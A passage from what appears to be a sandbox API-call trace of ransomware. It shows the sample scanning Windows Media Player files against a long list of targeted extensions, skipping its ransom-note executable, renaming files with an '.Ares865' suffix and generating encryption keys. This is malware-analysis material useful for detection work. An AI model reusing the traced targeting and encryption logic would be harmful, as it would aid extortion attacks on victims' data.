(lpString1="exe", lpString2="mav") returned -1 [0121.712] lstrlenW (lpString="maw") returned 3 [0121.712] lstrcmpiW (lpString1="exe", lpString2="maw") returned -1 [0121.712] lstrlenW (lpString="mdbhtml") returned 7 [0121.712] lstrcmpiW (lpString1="nch.exe", lpString2="mdbhtml") returned 1 [0121.712] lstrlenW (lpString="mdn") returned 3 [0121.712] lstrcmpiW (lpString1="exe", lpString2="mdn") returned -1 [0121.712] lstrlenW (lpString="mdt") returned 3 [0121.713] lstrcmpiW (lpString1="exe", lpString2="mdt") returned -1 [0121.713] lstrlenW (lpString="mfd") returned 3 [0121.713] lstrcmpiW (lpString1="exe", lpString2="mfd") returned -1 [0121.713] lstrlenW (lpString="mpd") returned 3 [0121.713] lstrcmpiW (lpString1="exe", lpString2="mpd") returned -1 [0121.713] lstrlenW (lpString="mrg") returned 3 [0121.713] lstrcmpiW (lpString1="exe", lpString2="mrg") returned -1 [0121.713] lstrlenW (lpString="mud") returned 3 [0121.713] lstrcmpiW (lpString1="exe", lpString2="mud") returned -1 [0121.713] lstrlenW (lpString="mwb") returned 3 [0121.713] lstrcmpiW (lpString1="exe", lpString2="mwb") returned -1 [0121.713] lstrlenW (lpString="myd") returned 3 [0121.713] lstrcmpiW (lpString1="exe", lpString2="myd") returned -1 [0121.713] lstrlenW (lpString="ndf") returned 3 [0121.713] lstrcmpiW (lpString1="exe", lpString2="ndf") returned -1 [0121.713] lstrlenW (lpString="nnt") returned 3 [0121.713] lstrcmpiW (lpString1="exe", lpString2="nnt") returned -1 [0121.713] lstrlenW (lpString="nrmlib") returned 6 [0121.713] lstrcmpiW (lpString1="ch.exe", lpString2="nrmlib") returned -1 [0121.713] lstrlenW (lpString="ns2") returned 3 [0121.713] lstrcmpiW (lpString1="exe", lpString2="ns2") returned -1 [0121.713] lstrlenW (lpString="ns3") returned 3 [0121.713] lstrcmpiW (lpString1="exe", lpString2="ns3") returned -1 [0121.713] lstrlenW (lpString="ns4") returned 3 [0121.713] lstrcmpiW (lpString1="exe", lpString2="ns4") returned -1 [0121.713] lstrlenW (lpString="nsf") returned 3 [0121.713] lstrcmpiW (lpString1="exe", lpString2="nsf") returned -1 [0121.713] lstrlenW (lpString="nv") returned 2 [0121.713] lstrcmpiW (lpString1="xe", lpString2="nv") returned 1 [0121.713] lstrlenW (lpString="nv2") returned 3 [0121.713] lstrcmpiW (lpString1="exe", lpString2="nv2") returned -1 [0121.713] lstrlenW (lpString="nwdb") returned 4 [0121.713] lstrcmpiW (lpString1=".exe", lpString2="nwdb") returned -1 [0121.713] lstrlenW (lpString="nyf") returned 3 [0121.714] lstrcmpiW (lpString1="exe", lpString2="nyf") returned -1 [0121.714] lstrlenW (lpString="odb") returned 3 [0121.714] lstrcmpiW (lpString1="exe", lpString2="odb") returned -1 [0121.714] lstrlenW (lpString="odb") returned 3 [0121.714] lstrcmpiW (lpString1="exe", lpString2="odb") returned -1 [0121.714] lstrlenW (lpString="oqy") returned 3 [0121.714] lstrcmpiW (lpString1="exe", lpString2="oqy") returned -1 [0121.714] lstrlenW (lpString="ora") returned 3 [0121.714] lstrcmpiW (lpString1="exe", lpString2="ora") returned -1 [0121.714] lstrlenW (lpString="orx") returned 3 [0121.714] lstrcmpiW (lpString1="exe", lpString2="orx") returned -1 [0121.714] lstrlenW (lpString="owc") returned 3 [0121.714] lstrcmpiW (lpString1="exe", lpString2="owc") returned -1 [0121.714] lstrlenW (lpString="p96") returned 3 [0121.714] lstrcmpiW (lpString1="exe", lpString2="p96") returned -1 [0121.714] lstrlenW (lpString="p97") returned 3 [0121.714] lstrcmpiW (lpString1="exe", lpString2="p97") returned -1 [0121.714] lstrlenW (lpString="pan") returned 3 [0121.714] lstrcmpiW (lpString1="exe", lpString2="pan") returned -1 [0121.714] lstrlenW (lpString="pdb") returned 3 [0121.714] lstrcmpiW (lpString1="exe", lpString2="pdb") returned -1 [0121.714] lstrlenW (lpString="pdm") returned 3 [0121.714] lstrcmpiW (lpString1="exe", lpString2="pdm") returned -1 [0121.714] lstrlenW (lpString="pnz") returned 3 [0121.714] lstrcmpiW (lpString1="exe", lpString2="pnz") returned -1 [0121.714] lstrlenW (lpString="qry") returned 3 [0121.714] lstrcmpiW (lpString1="exe", lpString2="qry") returned -1 [0121.714] lstrlenW (lpString="qvd") returned 3 [0121.714] lstrcmpiW (lpString1="exe", lpString2="qvd") returned -1 [0121.714] lstrlenW (lpString="rbf") returned 3 [0121.714] lstrcmpiW (lpString1="exe", lpString2="rbf") returned -1 [0121.714] lstrlenW (lpString="rctd") returned 4 [0121.714] lstrcmpiW (lpString1=".exe", lpString2="rctd") returned -1 [0121.714] lstrlenW (lpString="rod") returned 3 [0121.715] lstrcmpiW (lpString1="exe", lpString2="rod") returned -1 [0121.715] lstrlenW (lpString="rodx") returned 4 [0121.715] lstrcmpiW (lpString1=".exe", lpString2="rodx") returned -1 [0121.715] lstrlenW (lpString="rpd") returned 3 [0121.715] lstrcmpiW (lpString1="exe", lpString2="rpd") returned -1 [0121.715] lstrlenW (lpString="rsd") returned 3 [0121.715] lstrcmpiW (lpString1="exe", lpString2="rsd") returned -1 [0121.715] lstrlenW (lpString="sas7bdat") returned 8 [0121.715] lstrcmpiW (lpString1="unch.exe", lpString2="sas7bdat") returned 1 [0121.715] lstrlenW (lpString="sbf") returned 3 [0121.715] lstrcmpiW (lpString1="exe", lpString2="sbf") returned -1 [0121.715] lstrlenW (lpString="scx") returned 3 [0121.715] lstrcmpiW (lpString1="exe", lpString2="scx") returned -1 [0121.715] lstrlenW (lpString="sdb") returned 3 [0121.715] lstrcmpiW (lpString1="exe", lpString2="sdb") returned -1 [0121.715] lstrlenW (lpString="sdc") returned 3 [0121.715] lstrcmpiW (lpString1="exe", lpString2="sdc") returned -1 [0121.715] lstrlenW (lpString="sdf") returned 3 [0121.715] lstrcmpiW (lpString1="exe", lpString2="sdf") returned -1 [0121.715] lstrlenW (lpString="sis") returned 3 [0121.715] lstrcmpiW (lpString1="exe", lpString2="sis") returned -1 [0121.715] lstrlenW (lpString="spq") returned 3 [0121.715] lstrcmpiW (lpString1="exe", lpString2="spq") returned -1 [0121.715] lstrlenW (lpString="te") returned 2 [0121.715] lstrcmpiW (lpString1="xe", lpString2="te") returned 1 [0121.715] lstrlenW (lpString="teacher") returned 7 [0121.715] lstrcmpiW (lpString1="nch.exe", lpString2="teacher") returned -1 [0121.715] lstrlenW (lpString="tmd") returned 3 [0121.715] lstrcmpiW (lpString1="exe", lpString2="tmd") returned -1 [0121.715] lstrlenW (lpString="tps") returned 3 [0121.715] lstrcmpiW (lpString1="exe", lpString2="tps") returned -1 [0121.715] lstrlenW (lpString="trc") returned 3 [0121.715] lstrcmpiW (lpString1="exe", lpString2="trc") returned -1 [0121.715] lstrlenW (lpString="trc") returned 3 [0121.716] lstrcmpiW (lpString1="exe", lpString2="trc") returned -1 [0121.716] lstrlenW (lpString="trm") returned 3 [0121.716] lstrcmpiW (lpString1="exe", lpString2="trm") returned -1 [0121.716] lstrlenW (lpString="udb") returned 3 [0121.716] lstrcmpiW (lpString1="exe", lpString2="udb") returned -1 [0121.716] lstrlenW (lpString="udl") returned 3 [0121.716] lstrcmpiW (lpString1="exe", lpString2="udl") returned -1 [0121.716] lstrlenW (lpString="usr") returned 3 [0121.716] lstrcmpiW (lpString1="exe", lpString2="usr") returned -1 [0121.716] lstrlenW (lpString="v12") returned 3 [0121.716] lstrcmpiW (lpString1="exe", lpString2="v12") returned -1 [0121.716] lstrlenW (lpString="vis") returned 3 [0121.716] lstrcmpiW (lpString1="exe", lpString2="vis") returned -1 [0121.716] lstrlenW (lpString="vpd") returned 3 [0121.716] lstrcmpiW (lpString1="exe", lpString2="vpd") returned -1 [0121.716] lstrlenW (lpString="vvv") returned 3 [0121.716] lstrcmpiW (lpString1="exe", lpString2="vvv") returned -1 [0121.716] lstrlenW (lpString="wdb") returned 3 [0121.716] lstrcmpiW (lpString1="exe", lpString2="wdb") returned -1 [0121.716] lstrlenW (lpString="wmdb") returned 4 [0121.716] lstrcmpiW (lpString1=".exe", lpString2="wmdb") returned -1 [0121.716] lstrlenW (lpString="wrk") returned 3 [0121.716] lstrcmpiW (lpString1="exe", lpString2="wrk") returned -1 [0121.716] lstrlenW (lpString="xdb") returned 3 [0121.716] lstrcmpiW (lpString1="exe", lpString2="xdb") returned -1 [0121.716] lstrlenW (lpString="xld") returned 3 [0121.716] lstrcmpiW (lpString1="exe", lpString2="xld") returned -1 [0121.716] lstrlenW (lpString="xmlff") returned 5 [0121.716] lstrcmpiW (lpString1="h.exe", lpString2="xmlff") returned -1 [0121.716] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Media Player\\wmlaunch.exe.Ares865") returned 64 [0121.717] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Media Player\\wmlaunch.exe" (normalized: "c:\\program files (x86)\\windows media player\\wmlaunch.exe"), lpNewFileName="C:\\Program Files (x86)\\Windows Media Player\\wmlaunch.exe.Ares865" (normalized: "c:\\program files (x86)\\windows media player\\wmlaunch.exe.ares865"), dwFlags=0x1) returned 1 [0121.720] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Media Player\\wmlaunch.exe.Ares865" (normalized: "c:\\program files (x86)\\windows media player\\wmlaunch.exe.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0121.720] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=228352) returned 1 [0121.720] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0121.729] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0121.729] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0121.754] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0121.755] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0121.755] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0121.758] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb3f0b33d, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb3f0b33d, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb3f0b33d, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x18e00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="wmpconfig.exe", cAlternateFileName="")) returned 1 [0121.758] lstrcmpiW (lpString1="wmpconfig.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0121.758] lstrcmpiW (lpString1="wmpconfig.exe", lpString2="aoldtz.exe") returned 1 [0121.758] lstrcpyW (in: lpString1=0x2cce458, lpString2="wmpconfig.exe" | out: lpString1="wmpconfig.exe") returned="wmpconfig.exe" [0121.758] lstrlenW (lpString="wmpconfig.exe") returned 13 [0121.759] lstrlenW (lpString="Ares865") returned 7 [0121.759] lstrcmpiW (lpString1="fig.exe", lpString2="Ares865") returned 1 [0121.759] lstrlenW (lpString=".dll") returned 4 [0121.759] lstrcmpiW (lpString1="wmpconfig.exe", lpString2=".dll") returned 1 [0121.759] lstrlenW (lpString=".lnk") returned 4 [0121.759] lstrcmpiW (lpString1="wmpconfig.exe", lpString2=".lnk") returned 1 [0121.759] lstrlenW (lpString=".ini") returned 4 [0121.759] lstrcmpiW (lpString1="wmpconfig.exe", lpString2=".ini") returned 1 [0121.759] lstrlenW (lpString=".sys") returned 4 [0121.759] lstrcmpiW (lpString1="wmpconfig.exe", lpString2=".sys") returned 1 [0121.759] lstrlenW (lpString="wmpconfig.exe") returned 13 [0121.759] lstrlenW (lpString="bak") returned 3 [0121.759] lstrcmpiW (lpString1="exe", lpString2="bak") returned 1 [0121.759] lstrlenW (lpString="ba_") returned 3 [0121.759] lstrcmpiW (lpString1="exe", lpString2="ba_") returned 1 [0121.759] lstrlenW (lpString="dbb") returned 3 [0121.759] lstrcmpiW (lpString1="exe", lpString2="dbb") returned 1 [0121.759] lstrlenW (lpString="vmdk") returned 4 [0121.759] lstrcmpiW (lpString1=".exe", lpString2="vmdk") returned -1 [0121.759] lstrlenW (lpString="rar") returned 3 [0121.759] lstrcmpiW (lpString1="exe", lpString2="rar") returned -1 [0121.759] lstrlenW (lpString="zip") returned 3 [0121.759] lstrcmpiW (lpString1="exe", lpString2="zip") returned -1 [0121.759] lstrlenW (lpString="tgz") returned 3 [0121.759] lstrcmpiW (lpString1="exe", lpString2="tgz") returned -1 [0121.759] lstrlenW (lpString="vbox") returned 4 [0121.759] lstrcmpiW (lpString1=".exe", lpString2="vbox") returned -1 [0121.759] lstrlenW (lpString="vdi") returned 3 [0121.759] lstrcmpiW (lpString1="exe", lpString2="vdi") returned -1 [0121.759] lstrlenW (lpString="vhd") returned 3 [0121.759] lstrcmpiW (lpString1="exe", lpString2="vhd") returned -1 [0121.759] lstrlenW (lpString="vhdx") returned 4 [0121.759] lstrcmpiW (lpString1=".exe", lpString2="vhdx") returned -1 [0121.760] lstrlenW (lpString="avhd") returned 4 [0121.760] lstrcmpiW (lpString1=".exe", lpString2="avhd") returned -1 [0121.760] lstrlenW (lpString="db") returned 2 [0121.760] lstrcmpiW (lpString1="xe", lpString2="db") returned 1 [0121.760] lstrlenW (lpString="db2") returned 3 [0121.760] lstrcmpiW (lpString1="exe", lpString2="db2") returned 1 [0121.760] lstrlenW (lpString="db3") returned 3 [0121.760] lstrcmpiW (lpString1="exe", lpString2="db3") returned 1 [0121.760] lstrlenW (lpString="dbf") returned 3 [0121.760] lstrcmpiW (lpString1="exe", lpString2="dbf") returned 1 [0121.760] lstrlenW (lpString="mdf") returned 3 [0121.760] lstrcmpiW (lpString1="exe", lpString2="mdf") returned -1 [0121.760] lstrlenW (lpString="mdb") returned 3 [0121.760] lstrcmpiW (lpString1="exe", lpString2="mdb") returned -1 [0121.760] lstrlenW (lpString="sql") returned 3 [0121.760] lstrcmpiW (lpString1="exe", lpString2="sql") returned -1 [0121.760] lstrlenW (lpString="sqlite") returned 6 [0121.760] lstrcmpiW (lpString1="ig.exe", lpString2="sqlite") returned -1 [0121.760] lstrlenW (lpString="sqlite3") returned 7 [0121.760] lstrcmpiW (lpString1="fig.exe", lpString2="sqlite3") returned -1 [0121.760] lstrlenW (lpString="sqlitedb") returned 8 [0121.760] lstrcmpiW (lpString1="nfig.exe", lpString2="sqlitedb") returned -1 [0121.760] lstrlenW (lpString="xml") returned 3 [0121.760] lstrcmpiW (lpString1="exe", lpString2="xml") returned -1 [0121.760] lstrlenW (lpString="$er") returned 3 [0121.760] lstrcmpiW (lpString1="exe", lpString2="$er") returned 1 [0121.760] lstrlenW (lpString="4dd") returned 3 [0121.760] lstrcmpiW (lpString1="exe", lpString2="4dd") returned 1 [0121.760] lstrlenW (lpString="4dl") returned 3 [0121.760] lstrcmpiW (lpString1="exe", lpString2="4dl") returned 1 [0121.760] lstrlenW (lpString="^^^") returned 3 [0121.760] lstrcmpiW (lpString1="exe", lpString2="^^^") returned 1 [0121.760] lstrlenW (lpString="abs") returned 3 [0121.760] lstrcmpiW (lpString1="exe", lpString2="abs") returned 1 [0121.760] lstrlenW (lpString="abx") returned 3 [0121.761] lstrcmpiW (lpString1="exe", lpString2="abx") returned 1 [0121.761] lstrlenW (lpString="accdb") returned 5 [0121.761] lstrcmpiW (lpString1="g.exe", lpString2="accdb") returned 1 [0121.761] lstrlenW (lpString="accdc") returned 5 [0121.761] lstrcmpiW (lpString1="g.exe", lpString2="accdc") returned 1 [0121.761] lstrlenW (lpString="accde") returned 5 [0121.761] lstrcmpiW (lpString1="g.exe", lpString2="accde") returned 1 [0121.761] lstrlenW (lpString="accdr") returned 5 [0121.761] lstrcmpiW (lpString1="g.exe", lpString2="accdr") returned 1 [0121.761] lstrlenW (lpString="accdt") returned 5 [0121.761] lstrcmpiW (lpString1="g.exe", lpString2="accdt") returned 1 [0121.761] lstrlenW (lpString="accdw") returned 5 [0121.761] lstrcmpiW (lpString1="g.exe", lpString2="accdw") returned 1 [0121.761] lstrlenW (lpString="accft") returned 5 [0121.761] lstrcmpiW (lpString1="g.exe", lpString2="accft") returned 1 [0121.761] lstrlenW (lpString="adb") returned 3 [0121.761] lstrcmpiW (lpString1="exe", lpString2="adb") returned 1 [0121.761] lstrlenW (lpString="adb") returned 3 [0121.761] lstrcmpiW (lpString1="exe", lpString2="adb") returned 1 [0121.761] lstrlenW (lpString="ade") returned 3 [0121.761] lstrcmpiW (lpString1="exe", lpString2="ade") returned 1 [0121.761] lstrlenW (lpString="adf") returned 3 [0121.761] lstrcmpiW (lpString1="exe", lpString2="adf") returned 1 [0121.761] lstrlenW (lpString="adn") returned 3 [0121.761] lstrcmpiW (lpString1="exe", lpString2="adn") returned 1 [0121.761] lstrlenW (lpString="adp") returned 3 [0121.761] lstrcmpiW (lpString1="exe", lpString2="adp") returned 1 [0121.761] lstrlenW (lpString="alf") returned 3 [0121.761] lstrcmpiW (lpString1="exe", lpString2="alf") returned 1 [0121.761] lstrlenW (lpString="ask") returned 3 [0121.761] lstrcmpiW (lpString1="exe", lpString2="ask") returned 1 [0121.761] lstrlenW (lpString="btr") returned 3 [0121.761] lstrcmpiW (lpString1="exe", lpString2="btr") returned 1 [0121.762] lstrlenW (lpString="cat") returned 3 [0121.762] lstrcmpiW (lpString1="exe", lpString2="cat") returned 1 [0121.762] lstrlenW (lpString="cdb") returned 3 [0121.762] lstrcmpiW (lpString1="exe", lpString2="cdb") returned 1 [0121.762] lstrlenW (lpString="ckp") returned 3 [0121.762] lstrcmpiW (lpString1="exe", lpString2="ckp") returned 1 [0121.762] lstrlenW (lpString="cma") returned 3 [0121.762] lstrcmpiW (lpString1="exe", lpString2="cma") returned 1 [0121.762] lstrlenW (lpString="cpd") returned 3 [0121.762] lstrcmpiW (lpString1="exe", lpString2="cpd") returned 1 [0121.762] lstrlenW (lpString="dacpac") returned 6 [0121.762] lstrcmpiW (lpString1="ig.exe", lpString2="dacpac") returned 1 [0121.762] lstrlenW (lpString="dad") returned 3 [0121.762] lstrcmpiW (lpString1="exe", lpString2="dad") returned 1 [0121.762] lstrlenW (lpString="dadiagrams") returned 10 [0121.762] lstrcmpiW (lpString1="config.exe", lpString2="dadiagrams") returned -1 [0121.762] lstrlenW (lpString="daschema") returned 8 [0121.762] lstrcmpiW (lpString1="nfig.exe", lpString2="daschema") returned 1 [0121.762] lstrlenW (lpString="db-journal") returned 10 [0121.762] lstrcmpiW (lpString1="config.exe", lpString2="db-journal") returned -1 [0121.762] lstrlenW (lpString="db-shm") returned 6 [0121.762] lstrcmpiW (lpString1="ig.exe", lpString2="db-shm") returned 1 [0121.762] lstrlenW (lpString="db-wal") returned 6 [0121.762] lstrcmpiW (lpString1="ig.exe", lpString2="db-wal") returned 1 [0121.762] lstrlenW (lpString="dbc") returned 3 [0121.762] lstrcmpiW (lpString1="exe", lpString2="dbc") returned 1 [0121.762] lstrlenW (lpString="dbs") returned 3 [0121.762] lstrcmpiW (lpString1="exe", lpString2="dbs") returned 1 [0121.762] lstrlenW (lpString="dbt") returned 3 [0121.762] lstrcmpiW (lpString1="exe", lpString2="dbt") returned 1 [0121.762] lstrlenW (lpString="dbv") returned 3 [0121.762] lstrcmpiW (lpString1="exe", lpString2="dbv") returned 1 [0121.762] lstrlenW (lpString="dbx") returned 3 [0121.763] lstrcmpiW (lpString1="exe", lpString2="dbx") returned 1 [0121.763] lstrlenW (lpString="dcb") returned 3 [0121.763] lstrcmpiW (lpString1="exe", lpString2="dcb") returned 1 [0121.763] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Media Player\\wmpconfig.exe.Ares865") returned 65 [0121.763] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Media Player\\wmpconfig.exe" (normalized: "c:\\program files (x86)\\windows media player\\wmpconfig.exe"), lpNewFileName="C:\\Program Files (x86)\\Windows Media Player\\wmpconfig.exe.Ares865" (normalized: "c:\\program files (x86)\\windows media player\\wmpconfig.exe.ares865"), dwFlags=0x1) returned 1 [0121.765] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Media Player\\wmpconfig.exe.Ares865" (normalized: "c:\\program files (x86)\\windows media player\\wmpconfig.exe.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0121.766] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=101888) returned 1 [0121.766] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0121.767] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0121.767] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0121.789] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0121.790] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0121.790] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0121.792] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb669e146, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb669e146, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb66c42a7, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0xf0000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="WMPDMC.exe", cAlternateFileName="")) returned 1 [0121.792] lstrcmpiW (lpString1="WMPDMC.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0121.792] lstrcmpiW (lpString1="WMPDMC.exe", lpString2="aoldtz.exe") returned 1 [0121.793] lstrcpyW (in: lpString1=0x2cce458, lpString2="WMPDMC.exe" | out: lpString1="WMPDMC.exe") returned="WMPDMC.exe" [0121.793] lstrlenW (lpString="WMPDMC.exe") returned 10 [0121.793] lstrlenW (lpString="Ares865") returned 7 [0121.793] lstrcmpiW (lpString1="DMC.exe", lpString2="Ares865") returned 1 [0121.793] lstrlenW (lpString=".dll") returned 4 [0121.793] lstrcmpiW (lpString1="WMPDMC.exe", lpString2=".dll") returned 1 [0121.793] lstrlenW (lpString=".lnk") returned 4 [0121.793] lstrcmpiW (lpString1="WMPDMC.exe", lpString2=".lnk") returned 1 [0121.793] lstrlenW (lpString=".ini") returned 4 [0121.793] lstrcmpiW (lpString1="WMPDMC.exe", lpString2=".ini") returned 1 [0121.793] lstrlenW (lpString=".sys") returned 4 [0121.793] lstrcmpiW (lpString1="WMPDMC.exe", lpString2=".sys") returned 1 [0121.793] lstrlenW (lpString="WMPDMC.exe") returned 10 [0121.793] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Media Player\\WMPDMC.exe.Ares865") returned 62 [0121.793] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Media Player\\WMPDMC.exe" (normalized: "c:\\program files (x86)\\windows media player\\wmpdmc.exe"), lpNewFileName="C:\\Program Files (x86)\\Windows Media Player\\WMPDMC.exe.Ares865" (normalized: "c:\\program files (x86)\\windows media player\\wmpdmc.exe.ares865"), dwFlags=0x1) returned 1 [0121.796] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Media Player\\WMPDMC.exe.Ares865" (normalized: "c:\\program files (x86)\\windows media player\\wmpdmc.exe.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0121.796] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=983040) returned 1 [0121.796] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0121.797] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0121.797] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0121.892] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0121.893] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0121.893] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0121.909] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x42b8907f, ftCreationTime.dwHighDateTime=0x1ca0417, ftLastAccessTime.dwLowDateTime=0x42b8907f, ftLastAccessTime.dwHighDateTime=0x1ca0417, ftLastWriteTime.dwLowDateTime=0xb19c3730, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x4f200, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="WMPDMCCore.dll", cAlternateFileName="")) returned 1 [0121.909] lstrcmpiW (lpString1="WMPDMCCore.dll", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0121.909] lstrcmpiW (lpString1="WMPDMCCore.dll", lpString2="aoldtz.exe") returned 1 [0121.909] lstrcpyW (in: lpString1=0x2cce458, lpString2="WMPDMCCore.dll" | out: lpString1="WMPDMCCore.dll") returned="WMPDMCCore.dll" [0121.909] lstrlenW (lpString="WMPDMCCore.dll") returned 14 [0121.909] lstrlenW (lpString="Ares865") returned 7 [0121.909] lstrcmpiW (lpString1="ore.dll", lpString2="Ares865") returned 1 [0121.909] lstrlenW (lpString=".dll") returned 4 [0121.909] lstrcmpiW (lpString1="WMPDMCCore.dll", lpString2=".dll") returned 1 [0121.909] lstrlenW (lpString=".lnk") returned 4 [0121.909] lstrcmpiW (lpString1="WMPDMCCore.dll", lpString2=".lnk") returned 1 [0121.909] lstrlenW (lpString=".ini") returned 4 [0121.909] lstrcmpiW (lpString1="WMPDMCCore.dll", lpString2=".ini") returned 1 [0121.909] lstrlenW (lpString=".sys") returned 4 [0121.909] lstrcmpiW (lpString1="WMPDMCCore.dll", lpString2=".sys") returned 1 [0121.909] lstrlenW (lpString="WMPDMCCore.dll") returned 14 [0121.910] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Media Player\\WMPDMCCore.dll.Ares865") returned 66 [0121.910] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Media Player\\WMPDMCCore.dll" (normalized: "c:\\program files (x86)\\windows media player\\wmpdmccore.dll"), lpNewFileName="C:\\Program Files (x86)\\Windows Media Player\\WMPDMCCore.dll.Ares865" (normalized: "c:\\program files (x86)\\windows media player\\wmpdmccore.dll.ares865"), dwFlags=0x1) returned 1 [0121.912] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Media Player\\WMPDMCCore.dll.Ares865" (normalized: "c:\\program files (x86)\\windows media player\\wmpdmccore.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0121.913] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=324096) returned 1 [0121.913] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0121.914] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0121.914] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0121.963] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0121.964] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0121.964] 